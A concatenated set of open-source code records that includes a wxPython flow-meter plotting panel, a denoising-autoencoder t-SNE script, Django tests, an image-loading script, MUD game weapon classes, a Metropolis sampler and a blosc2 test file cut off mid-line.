Bold',20),text='1',width=4,height=2,command=lambda:press(1),bg=\"Gold\",bd=14).grid(row=3,column=1)\n num2 = Button(frame,font=('Script MT Bold',20),text='2',width=4,height=2,command=lambda:press(2),bg=\"Gold\",bd=14).grid(row=3,column=2)\n num3 = Button(frame,font=('Script MT Bold',20),text='3',width=4,height=2,command=lambda:press(3),bg=\"Gold\",bd=14).grid(row=3,column=3)\n num0 = Button(frame,font=('Script MT Bold',20),text='0',width=4,height=2,command=lambda:press(0),bg=\"Gold\",bd=14).grid(row=4,column=2)\n plusminus = Button(frame,font=('Script MT Bold',20),text='±',width=4,height=2,command=lambda:press('-'),bd=14).grid(row=4,column=3)\n symdot = Button(frame,font=('Script MT Bold',20),text='.',width=4,height=2,command=lambda:press('.'),bd=14).grid(row=4,column=1)\n symequal = Button(frame,font=('Script MT Bold',20),text='=',width=4,height=2,command=equalpress,bd=14).grid(row=4,column=5)\n symplus = Button(frame,font=('Script MT Bold',20),text='+',width=4,height=2,command=lambda:press('+'),bd=14).grid(row=4,column=4)\n symminus = Button(frame,font=('Script MT Bold',20),text='-',width=4,height=2,command=lambda:press('-'),bd=14).grid(row=3,column=4)\n sympercent = Button(frame,font=('Script MT Bold',20),text='%',width=4,height=2,command=lambda:press('/100'),bd=14).grid(row=3,column=5)\n symdivide = Button(frame,font=('Script MT Bold',20),text='÷',width=4,height=2,command=lambda:press('/'),bd=14).grid(row=2,column=5)\n symmultiply = Button(frame,font=('Script MT Bold',20),text='×',width=4,height=2,command=lambda:press('*'),bd=14).grid(row=2,column=4)\n symsquare = Button(frame,font=('Script MT Bold',20),text='ײ',width=4,height=2,command=lambda:press('**2'),bd=14).grid(row=1,column=4)\n symsquareroot=Button(frame,font=('Script MT Bold',20),text='√',width=4,height=2,command=lambda:press('**0.5'),bd=14).grid(row=1,column=5)\n\n #Author button\n author = Button(frame, text='Author', width=68, command=lambda:press('Kingsley')).grid(row=5, columnspan=7)\n\n\nframe.pack()\n\nroot.mainloop()\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"388683270","text":"#-------------------------------------------------------------------------\n# Flow Meter Panel\n''' author: Jeff Peery '''\n# date: 02/23/2011\n# email: JeffPeery@yahoo.com\n#-------------------------------------------------------------------------\n\n#----------------------------------------------------------------------\n# Revision Log\n#\n# Rev Date Author Description \n#----------------------------------------------------------------------\n# 1.01 2013/01/25 SPN Updated static box diagram to current layout\n# Widen sizer2 box to accomodate longer type label\n\n#-------------------------------------------------------------------------\n# MODULES\n#-------------------------------------------------------------------------\nimport os\nimport types\nimport string\nimport wx\nimport MODULES.myPlot as myPlot\nimport MODULES.myHeader as myHeader\nimport MODULES.myPlot as myPlot\nimport MODULES.myUtil as myUtil\n\n#-------------------------------------------------------------------------\n# Constants\n#-------------------------------------------------------------------------\n\nclass Panel(wx.Panel):\n def __init__(self, parent, num_axes=1):\n wx.Panel.__init__(self, parent=parent)\n self.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, 
myHeader.FRAME_FONT))\n #----------------------------------\n # Attributes\n #----------------------------------\n self.parent = parent\n\n #----------------------------------\n # GUI Ctrl Definitions\n #----------------------------------\n self.labels_panel = wx.Panel(parent=self, size=wx.Size(100, 100), style=0)\n self.class_label = wx.StaticText(label='Class: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.class_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.product_label = wx.StaticText(label='Type: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.product_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.serial_num_label = wx.StaticText(label='Serial #: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.serial_num_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.meter_size_label = wx.StaticText(label='Size: (in)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.meter_size_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.software_rev_label = wx.StaticText(label='Rev: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.software_rev_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.nom_k_label = wx.StaticText(label='Nominal K: (ppg)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.nom_k_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.k_label = wx.StaticText(label='K: (ppg)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.k_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.fsadc_label = wx.StaticText(label='FSADC: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.fsadc_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.zradc_label = wx.StaticText(label='ZRADC: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.zradc_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.AO_label = wx.StaticText(label='AO: (mA)', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.AO_label.SetFont(wx.Font(myHeader.SYSTEM_PANEL_FONT_SIZE, wx.SWISS, wx.NORMAL, wx.NORMAL, False, myHeader.FRAME_FONT))\n self.rate_unit_label = wx.StaticText(label='Rate Unit: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n self.total_unit_label = wx.StaticText(label='Total Unit: ', parent=self.labels_panel, size=wx.Size(200, myHeader.STATIC_TEXT_HEIGHT), style=0)\n \n self.figure = myPlot.Figure(self, num_axes=num_axes)\n \n #----------------------------------\n # GUI Sizers\n #----------------------------------\n '''Sizer layout'''\n # Panel\n # -----static box-----------------------------------------\n # 
|-------------------------------------------------------------------------------------------------|\n # | 1|\n # | |---------------------------------------------------------------------------------------------| |\n # | | 4| |\n # | | |-----------------------------------------------------------------------------------------| | |\n # | | | 8| | |\n # | | | |-------------------| |-------------------| |-------------------| |-------------------| | | |\n # | | | | class label 2| | meter size 3| | rev 6| | ao 7| | | |\n # | | | | product label | | rate | | nominal k | | fsadc | | | |\n # | | | | serial # | | total | | K | | zradc | | | |\n # | | | |-------------------| |-------------------| |-------------------| |-------------------| | | |\n # | | |-----------------------------------------------------------------------------------------| | |\n # | |---------------------------------------------------------------------------------------------| |\n # | |\n # | |---------------------------------------------------------------------------------------------| |\n # | |figure 5| |\n # | | | |\n # | | | |\n # | | | |\n # | |---------------------------------------------------------------------------------------------| |\n # |-------------------------------------------------------------------------------------------------|\n # status bar\n #\n self.sizer1 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer2 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer3 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer4 = wx.BoxSizer(orient=wx.HORIZONTAL)\n self.sizer5 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer6 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer7 = wx.BoxSizer(orient=wx.VERTICAL)\n self.sizer8 = wx.BoxSizer(orient=wx.HORIZONTAL)\n \n self.sizer1.Add(self.sizer4, 0, border=0, flag=wx.EXPAND) \n self.sizer1.Add(self.sizer5, 1, border=0, flag=wx.EXPAND)\n\n self.sizer4.Add(self.labels_panel, 1, border=0, flag=wx.EXPAND)\n self.labels_panel.SetSizer(self.sizer8)\n \n self.sizer8.Add(self.sizer2, 3, border=0, flag=wx.EXPAND)\n self.sizer8.Add(self.sizer3, 2, border=0, flag=wx.EXPAND)\n self.sizer8.Add(self.sizer6, 2, border=0, flag=wx.EXPAND)\n self.sizer8.Add(self.sizer7, 2, border=0, flag=wx.EXPAND)\n \n self.sizer5.Add(self.figure, 1, border=myHeader.CTRL_SPACING, flag=wx.EXPAND | wx.ALL)\n\n self.sizer2.Add(self.class_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer2.Add(self.product_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer2.Add(self.serial_num_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.sizer3.Add(self.meter_size_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer3.Add(self.rate_unit_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer3.Add(self.total_unit_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.sizer6.Add(self.software_rev_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer6.Add(self.nom_k_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer6.Add(self.k_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.sizer7.Add(self.AO_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer7.Add(self.fsadc_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n self.sizer7.Add(self.zradc_label, 0, border=myHeader.CTRL_SPACING, flag=wx.ALL | wx.EXPAND )\n\n self.SetSizer(self.sizer1)\n self.Layout()\n 
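# Note: sizer8 gives the four label columns a 3:2:2:2 horizontal split\r\n        # (sizer2, sizer3, sizer6, sizer7), matching the column widths sketched in\r\n        # the diagram above.\r\n        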
#----------------------------------\n # GUI Ctrl Initializations\n #----------------------------------\n self.SetupLabels()\n self.InitializePlot()\n self.ClearAxes()\n #----------------------------------\n # Events\n #----------------------------------\n\n def SetYLimits(self, y_min, y_max, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetYLimits(y_min, y_max, index=index)\n \n def SetXLimits(self, x_min, x_max, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetXLimits(x_min, x_max, index=index)\n\n def SetXLabel(self, label, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetXLabel(label, index=index)\n \n def SetYLabel(self, label, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.SetYLabel(label, index=index)\n\n def ClearAxes(self): \n self.figure.ClearAxes()\n self.figure.Draw()\n\n def PlotSpecLimits(self, target, spec, rates, index=myPlot.AXES_INDEX_DEFAULT):\n self.figure.PlotSpecLimits(target, spec, rates, index=index)\n\n def MultiPointErrorBar(self, num_test_replicates, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(num_test_replicates) == types.ListType\n self.figure.MultiPointErrorBar(num_test_replicates, index=index)\n\n def ErrorBar(self, xy_data, y_err, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(xy_data) == types.TupleType\n self.figure.ErrorBar(xy_data, y_err, index=index)\n\n def Plot(self, xy_data, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(xy_data) == types.TupleType\n self.figure.Scatter(xy_data,\n myPlot.MARKER_SHAPE,\n myPlot.MARKER_SIZE,\n myPlot.MARKER_FACE_COLOR,\n myPlot.MARKER_EDGE_COLOR,\n myPlot.MARKER_EDGE_WIDTH,\n myPlot.ALPHA_SCATTER,\n index=index)\n \n def AppendPlot(self, xy_data, index=myPlot.AXES_INDEX_DEFAULT):\n assert type(xy_data) == types.TupleType\n self.figure.AppendData(xy_data,\n myPlot.MARKER_SHAPE,\n myPlot.MARKER_SIZE,\n myPlot.MARKER_FACE_COLOR,\n myPlot.MARKER_EDGE_COLOR,\n myPlot.MARKER_EDGE_WIDTH,\n myPlot.ALPHA_SCATTER,\n index=index)\n\n def SaveFigure(self, path):\n self.figure.SaveFigure(path)\n\n def RescaleImage(self, scale, path):\n self.figure.RescaleImage(path, scale)\n \n def InitializePlot(self): \n self.figure.Initialize()\n self.figure.SetXLabel(r'Flow Rate (gpm)')\n self.figure.SetYLabel(r'Error (%Reading)')\n self.figure.Draw()\n \n def SetupLabels(self):\n self.class_label.SetLabel(label='Class: ')\n self.product_label.SetLabel(label='Type: ')\n self.serial_num_label.SetLabel(label='Serial #: ')\n self.meter_size_label.SetLabel(label='Size: (in)')\n self.software_rev_label.SetLabel(label='Rev: ')\n self.nom_k_label.SetLabel(label='Nominal K: (ppg)')\n self.fsadc_label.SetLabel(label='FSADC: ')\n self.zradc_label.SetLabel(label='ZRADC: ')\n self.AO_label.SetLabel('AO: (mA)')\n self.rate_unit_label.SetLabel(label='Rate Unit: ')\n self.total_unit_label.SetLabel(label='Total Unit: ')\n\n def HideLabels(self):\n self.labels_panel.Show(False)\n self.Layout()\n \n def ShowLabels(self):\n self.labels_panel.Show(True)\n self.Layout()\n \n def Draw(self):\n self.figure.Draw()\n","sub_path":"GUI/MeterPanel.py","file_name":"MeterPanel.py","file_ext":"py","file_size_in_byte":13563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"308984350","text":"\n# coding: utf-8\n\n# In[12]:\n\n\nimport math\nimport numpy as np\nimport random\nfrom sklearn import manifold\nfrom keras.layers import Input, Dense,Dropout\nfrom keras.models import Model\nimport matplotlib.pyplot as plt \nimport datetime\n\n\n# In[13]:\n\n\ninput_matrix = 'simulate.txt'\ninput_label = 
'simulate_label.txt'\n\n\n# In[15]:\n\n\nimport pandas as pd  # needed for the DataFrame-based train/test split in DAE_t_SNE below (pandas was never imported)\n\ndat = np.loadtxt(input_matrix)\nX = dat.T\nM = np.shape(X)[0]\nN = np.shape(X)[1]\nprint(\"Cell numbers: \" + str(M))\nprint(\"Gene numbers: \" + str(N))\n \nf = open(input_label)\ntemp = f.read().splitlines()\nf.close()\nlabels=[]\nfor t in temp:\n    labels.append(eval(t))\n\nm = len(set(labels))\nprint(\"Cell types: \" + str(m))\n\nlabel_set = []\nfor n in labels:\n    if n not in label_set:\n        label_set.append(n)\nprint(label_set)\n \nY = np.log2(X+1)\n\n\n# In[20]:\n\n\nif __name__ == '__main__':\n    def DAE_t_SNE(matrix = input_matrix, label = input_label, n1 = N, n2 = N//10, \n                  n3 = max(N//100, 30),test_set_percent = 0.1, encoding_dim = 30,\n                  drop = 0.5, activation = 'relu',optimizer = 'adam', loss = 'mse', \n                  epoch = 50, batch_size=10):\n        start_time = datetime.datetime.now() \n\n        X_test = pd.DataFrame(Y).sample(frac=test_set_percent)\n        X_train = pd.DataFrame(Y).drop(X_test.index)\n        \n        input = Input(shape=(n1,))\n        input_corrupted = Dropout(drop)(input)\n\n        encoded_1 = Dense(n2, activation = activation)(input_corrupted)\n        encoded_2 = Dense(n3, activation = activation)(encoded_1)\n        encoder_output = Dense(encoding_dim,activation = activation )(encoded_2)\n\n        decoded_1 = Dense(n3, activation = activation)(encoder_output)\n        decoded_2 = Dense(n2, activation = activation)(decoded_1)\n        decoder_output = Dense(n1, activation = activation)(decoded_2)\n        \n        autoencoder = Model(input, decoder_output)\n        encoder = Model(input, encoder_output)\n        autoencoder.compile(optimizer = optimizer, loss = loss)\n        hist = autoencoder.fit(X_train, X_train, epochs = epoch, batch_size = batch_size,\n                    shuffle=True, validation_data=(X_test, X_test))\n        lowdim = encoder.predict(Y)\n        \n        def apply_tSNE(X):\n            tsne = manifold.TSNE(n_components=2);\n            X_tsne = tsne.fit_transform(X);\n            return X_tsne\n        DAE_tSNE = apply_tSNE(lowdim)\n        np.save(\"DAE-t-SNE_simulate.npy\",DAE_tSNE)\n        np.savetxt(\"DAE-t-SNE_simulate.txt\",DAE_tSNE) \n        \n        finish_time = datetime.datetime.now()\n        print(\"DAE-t-SNE total time taken = \"+ str(finish_time - start_time))\n        \n\n\n# In[21]:\n\n\nDAE_t_SNE()\n\n\n# In[23]:\n\n\nDAE_tSNE = np.load(\"DAE-t-SNE_simulate.npy\")\nc_basic = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']\nc_advanced = ['aliceblue', 'antiquewhite', 'aqua', 'aquamarine', 'azure', 'beige', 'bisque', 'black', \n              'blanchedalmond', 'blue', 'blueviolet', 'brown', 'burlywood', 'cadetblue', 'chartreuse', \n              'chocolate', 'coral', 'cornflowerblue', 'cornsilk', 'crimson', 'cyan', 'darkblue', \n              'darkcyan', 'darkgoldenrod', 'darkgray', 'darkgreen', 'darkgrey', 'darkkhaki', 'darkmagenta',\n              'darkolivegreen', 'darkorange', 'darkorchid', 'darkred', 'darksalmon', 'darkseagreen', \n              'darkslateblue', 'darkslategray', 'darkslategrey', \n              'darkturquoise', 'darkviolet', 'deeppink', 'deepskyblue', 'dimgray', 'dimgrey', \n              'dodgerblue', 'firebrick', 'floralwhite', 'forestgreen', 'fuchsia', 'gainsboro',\n              'ghostwhite', 'gold', 'goldenrod', 'gray', 'green', 'greenyellow', 'grey', \n              'honeydew', 'hotpink', 'indianred', 'indigo', 'ivory', 'khaki', 'lavender', \n              'lavenderblush', 'lawngreen', 'lemonchiffon', 'lightblue', 'lightcoral', \n              'lightcyan', 'lightgoldenrodyellow', 'lightgray', 'lightgreen', 'lightgrey', \n              'lightpink', 'lightsalmon', 'lightseagreen', 'lightskyblue', 'lightslategray', \n              'lightslategrey', 'lightsteelblue', 'lightyellow', 'lime', 'limegreen', 'linen',\n              'magenta', 'maroon', 'mediumaquamarine', 'mediumblue', 'mediumorchid', \n              'mediumpurple', 'mediumseagreen', 'mediumslateblue', 'mediumspringgreen', \n              
'mediumturquoise', 'mediumvioletred', 'midnightblue', 'mintcream', 'mistyrose', \n 'moccasin', 'navajowhite', 'navy', 'oldlace', 'olive', 'olivedrab', 'orange', \n 'orangered', 'orchid', 'palegoldenrod', 'palegreen', 'paleturquoise', \n 'palevioletred', 'papayawhip', 'peachpuff', 'peru', 'pink', 'plum', 'powderblue',\n 'purple', 'rebeccapurple', 'red', 'rosybrown', 'royalblue', 'saddlebrown',\n 'salmon', 'sandybrown', 'seagreen', 'seashell', 'sienna', 'silver', 'skyblue', \n 'slateblue', 'slategray', 'slategrey', 'snow', 'springgreen', 'steelblue', 'tan',\n 'teal', 'thistle', 'tomato', 'turquoise', 'violet', 'wheat', 'white', \n 'whitesmoke', 'yellow', 'yellowgreen']\nc_shuffled= random.sample(c_advanced,len(c_advanced))\nc = c_basic + c_shuffled\nindex = []\nfor i in range(m):\n index.append([x == label_set[i] for x in labels])\n \nfor i in range(m):\n plt.scatter(DAE_tSNE[index[i],0], DAE_tSNE[index[i],1],c=c[i],label = label_set[i])\nplt.legend(bbox_to_anchor=(1.25,0.35))\nplt.title(\"DAE-t-SNE\")\nplt.show()\n \n\n","sub_path":"Code/DAE-t-SNE.py","file_name":"DAE-t-SNE.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198422301","text":"import uuid\n\nfrom django.test import TestCase\n\nfrom .models import *\n\nclass UserTests(TestCase):\n def test_validate_id(self):\n # Tests a valid ID\n id = uuid.uuid4()\n user = User(id = id)\n user.validate_id()\n\n id = 0xABAB\n user = User(id = id)\n with self.assertRaises(Exception):\n user.validate_id()\n\nclass UserFactoryTests(TestCase):\n def test_build(self):\n personal_data = UserPersonalData(\n username = \"Tester\",\n first_name = \"Testerman\",\n last_name = \"Testerson\",\n email = \"testerman@example.com\"\n )\n base_permissions = UserBasePermissions(\n is_staff = False,\n is_active = False\n )\n user = UserFactory.build_entity_with_id(personal_data, base_permissions)\n user.validate_id()\n\n\n","sub_path":"bank_ddd_demo/domain/users/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"428324991","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport cv2\r\nimport random\r\nimport pickle\r\n\r\nDATADIR = r'E:\\Study\\Year 4\\FYP\\images\\dataset_scaffold'\r\nCATEGORIES = ['Good', 'Bad']\r\n\r\nIMG_SIZE = 480\r\n\r\ntraining_data = []\r\n\r\n\r\ndef erode(img, ite_time):\r\n kernel = np.ones((5, 5), np.uint8)\r\n img_ero = cv2.erode(img, kernel, iterations=ite_time)\r\n\r\n return img_ero\r\n\r\n\r\ndef dilation(img, ite_time):\r\n kernel = np.ones((5, 5), np.uint8)\r\n img_dila = cv2.dilate(img, kernel, iterations=ite_time)\r\n\r\n return img_dila\r\n\r\n\r\ndef ero_dila(img, ite_time):\r\n img = erode(img, ite_time)\r\n\r\n return dilation(img, ite_time)\r\n\r\n\r\ndef handle_img(img):\r\n ret, thresh2 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY_INV)\r\n \r\n return ero_dila(thresh2, 2)\r\n\r\n\r\ndef create_training_data():\r\n for category in CATEGORIES:\r\n path = os.path.join(DATADIR, category)\r\n clas_num = CATEGORIES.index(category)\r\n\r\n for img in os.listdir(path):\r\n try:\r\n img_array = cv2.imread(os.path.join(path, img), 0)\r\n img_array = handle_img(img_array)\r\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\r\n\r\n training_data.append([new_array, clas_num])\r\n except Exception as e:\r\n 
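# skip files that fail to load or resize (unreadable or corrupt images)\r\n                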
pass\r\n\r\n\r\ncreate_training_data()\r\n\r\nrandom.shuffle(training_data)\r\n\r\nX = [] # features\r\ny = [] # labels\r\n\r\nfor features, label in training_data:\r\n    X.append(features)\r\n    y.append(label)\r\n\r\nX = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)\r\n\r\n# save model\r\npickle_out = open(\"X.pickle\", \"wb\")\r\npickle.dump(X, pickle_out)\r\npickle_out.close()\r\n\r\npickle_out = open(\"y.pickle\", \"wb\")\r\npickle.dump(y, pickle_out)\r\npickle_out.close()\r\n","sub_path":"load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"411227428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWeapons\n\nOur simple (for now) class for weapon objects\n\n\"\"\"\n\nfrom typeclasses.objects import Object\nfrom evennia.utils import utils, create, search, prettytable\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom evennia import create_object\nfrom django.conf import settings\n\n\nclass Weapon(Object):\n    \"\"\"\n    Base class for weapons; here we override return_appearance.\n    durability - the weapon's durability: the number of kills that can be made with it.\n    is_weapon - a flag marking that the item is a weapon, i.e. it can be used to kill.\n    \"\"\"\n    def at_object_creation(self):\n        # set our weapon's durability (int)\n        self.db.durability = 0\n        # and mark that our item is a weapon (bool)\n        self.db.is_weapon = True\n        # body part where the item is equipped\n        #self.db.placing = \"RightHand\"\n\n    def return_appearance(self, looker):\n        \"\"\"\n        Override of how the object's description is displayed\n        \"\"\"\n        if not looker:\n            return\n        # get and identify all objects\n        visible = (con for con in self.contents if con != looker and\n                   con.access(looker, \"view\"))\n        exits, users, things = [], [], []\n        for con in visible:\n            key = con.get_display_name(looker)\n            if con.destination:\n                exits.append(key)\n            elif con.has_player:\n                users.append(\"{c%s{n\" % key)\n            else:\n                things.append(key)\n        # get description, build string\n        string = \"{c%s{n\\n\" % self.get_display_name(looker)\n        desc = self.db.desc\n        durability = self.db.durability\n        if desc:\n            string += \"%s\" % desc\n        if things:\n            string += \"\\n{wComponents:{n \" + \", \".join(users + things)\n        if durability:\n            string += \"\\n{wDurability remaining: %s{n \" % durability\n        return string\n\nclass Knife(Weapon):\n\n    def at_object_creation(self):\n        # set our weapon's durability (int)\n        self.db.durability = 1\n        self.db.is_weapon = True\n        #self.db.placing = \"RightHand\"\n        self.db.desc = \"A cardboard knife. Sturdy enough to kill someone... once.\"\n\nclass AcidBottle(Weapon):\n\n\n    def at_object_creation(self):\n        # set our weapon's durability (int)\n        self.db.durability = 3\n        self.db.is_weapon = True\n        # body part where the item is equipped\n        #self.db.placing = \"RightHand\"\n        self.db.desc = \"A jar of sulfuric acid. You can douse someone with it and watch them die.\"\n\nclass Pistol(Weapon):\n\n    def at_object_creation(self):\n        # set our weapon's durability (int)\n        self.db.durability = 50\n        self.db.is_weapon = True\n        # body part where the item is equipped\n        #self.db.placing = \"RightHand\"\n        self.db.desc = \"A TT pistol.\"\n        mag = create_object(settings.BASE_OBJECT_TYPECLASS, \"A 12-round magazine\", self, home=self)\n        mag.db.desc = \"A 12-round magazine\"\n\n\n","sub_path":"typeclasses/weapons.py","file_name":"weapons.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"636379063","text":"# mtr.py\nimport numpy as np \nimport numpy.random as rd\nimport matplotlib.pyplot as plt\n\nclass Metropolis:\n    def __init__(self, pLarge, sigma):\n        self.pLarge = pLarge # probability of large step\n        self.sigma = sigma # standard deviation of perturbation\n\n    def sample(self, func, dim, nSamples):\n        samples = []\n        prevSample = rd.rand(dim)\n        prevVal = func(prevSample)\n        total = 0\n        while total < nSamples:\n            newSample = self.__mutate(prevSample, dim)\n            newVal = func(newSample)\n            if newVal < prevVal:\n                if prevVal == 0: # newVal = preVal = 0, must try again\n                    continue\n                elif rd.rand() > newVal / prevVal:\n                    samples.append(prevSample) # reject new sample\n                    total += 1\n                    continue\n            # otherwise accept\n            prevSample = newSample\n            prevVal = newVal\n            samples.append(newSample) \n            total += 1\n        return np.array(samples)\n\n    # Input a function of samples in primary sample space and get the minimum cost\n    def anneal(self, func, dim, r, T, T_min, nIte):\n        # Initialize samples\n        prevSample = rd.rand(dim)\n        bestSample = prevSample\n        prevVal = func(prevSample)\n        bestVal = prevVal\n\n        # Begin annealing loop\n        curT = T\n        print(\"Begin annealing\")\n        while curT > T_min:\n            print(\"T:\", curT)\n            for _ in range(nIte):\n                # Generate new sample\n                curSample = self.__mutate(prevSample, dim)\n\n                # Record if best solution so far is found\n                curVal = func(curSample)\n                if curVal < bestVal:\n                    prevVal = bestVal = curVal\n                    prevSample = bestSample = curSample\n                    print(\"Best:\", bestVal)\n                    continue\n\n                # Accept samples or not\n                dE = curVal - prevVal\n                if dE < 0 or (dE > 0 and rd.rand() < np.exp(-dE / curT)):\n                    prevVal = curVal\n                    prevSample = curSample\n                    print(\"Accepted: \", curVal)\n\n            curT *= r # anneal\n\n        return bestVal, bestSample\n\n    def __mutate(self, sample, dim):\n        if rd.rand() < self.pLarge: # large step\n            return rd.rand(dim)\n        else: # small step\n            return self.__wrap(sample + rd.randn(dim) * self.sigma, 0, 1)\n\n    @staticmethod\n    def __wrap(val, low, high):\n        step = high - low\n        ret = []\n        for v in val:\n            if v < low:\n                while v < low:\n                    v += step\n            elif v >= high:\n                while v >= high:\n                    v -= step\n            ret.append(v)\n        return np.array(ret)\n\nif __name__ == '__main__':\n    mtr = Metropolis(0.1, 0.005)\n    print(mtr.anneal(lambda x: 7 * np.sin(8 * x) + 6 * np.cos(5 * x), 1, 0.9, 1, 0.01, 100))\n    X = mtr.sample(lambda x: np.sin(np.pi * x), 1, 10000)\n    plt.hist(np.transpose(X).tolist())\n    plt.show()\n","sub_path":"_ModelTest/mtr.py","file_name":"mtr.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"544886861","text":"########################################################################\n#\n# Created: June 22, 2021\n# Author: The Blosc development team - 
blosc@blosc.org\n#\n########################################################################\nimport random\n\nimport numpy\nimport pytest\n\nimport blosc2\n\n\n@pytest.mark.parametrize(\"contiguous\", [True, False])\n@pytest.mark.parametrize(\"urlpath\", [None, \"b2frame\"])\n@pytest.mark.parametrize(\n \"nchunks, ninserts\",\n [\n (0, 3),\n (1, 1),\n (10, 3),\n (15, 17),\n ],\n)\n@pytest.mark.parametrize(\"copy\", [True, False])\n@pytest.mark.parametrize(\"create_chunk\", [True, False])\ndef test_schunk_insert_numpy(contiguous, urlpath, nchunks, ninserts, copy, create_chunk):\n storage = {\n \"contiguous\": contiguous,\n \"urlpath\": urlpath,\n \"cparams\": {\"nthreads\": 2, \"typesize\": 4},\n \"dparams\": {\"nthreads\": 2},\n }\n blosc2.remove_urlpath(urlpath)\n\n schunk = blosc2.SChunk(chunksize=200 * 1000 * 4, **storage)\n for i in range(nchunks):\n buffer = i * numpy.arange(200 * 1000, dtype=\"int32\")\n nchunks_ = schunk.append_data(buffer)\n assert nchunks_ == (i + 1)\n\n for i in range(ninserts):\n pos = random.randint(0, nchunks + i)\n buffer = 